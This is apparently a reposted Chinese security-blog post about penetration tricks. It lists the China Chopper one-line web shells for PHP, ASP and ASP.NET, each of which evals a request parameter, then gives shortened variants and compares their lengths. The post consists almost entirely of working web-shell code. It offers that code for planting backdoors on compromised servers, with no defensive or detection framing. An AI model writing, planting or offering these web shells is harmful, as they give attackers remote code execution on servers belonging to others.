渗透中的奇技淫巧---- 最短的各类一句话

  • A+
所属分类:安全文章

菜刀readme.txt中附带一3个一句话:

PHP:    <?php @eval($_POST['chopper']);?> ASP:    <%eval request("chopper")%> ASP.NET:    <%@ Page Language="Jscript"%><%eval(Request.Item["chopper"],"unsafe");%>


抛弃密码的长度不算,其实这3个一句话均不是最短的。
如:
PHP我们可以这样写:

<?php @eval($_POST['0']);?>   原版 <?=eval($_POST[0]);?>         缩小版

ASP我们可以这样写:

<%eval request("0")%>   原版 <%eval request(0)%>     缩小版


ASP.NET可以这样写:

<%@ Page Language="Jscript"%><%eval(Request.Item["z"],"unsafe");%>   原版 <%@Page Language=JS%><%eval(Request.Item(0),"unsafe");%>             缩小版


当然你也可以把它写成这样(很显然体积上不占优势):

<%@Page Language="JAVASCRIPT"%><%eval(Request.Item(0),"unsafe");%>


已经用了许久的东西,直接回复原贴感觉很多人看不到,还是单独发出来吧。
和原求助贴中的最长字符数对比:

<%@ Page Language="Jscript"%><%eval(Request.Item["1"],"unsafe <%@Page Language=JS%><%eval(Request.Item(0),"unsafe");%>


显然达到目的了。


本文始发于微信公众号(飓风网络安全):渗透中的奇技淫巧---- 最短的各类一句话

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: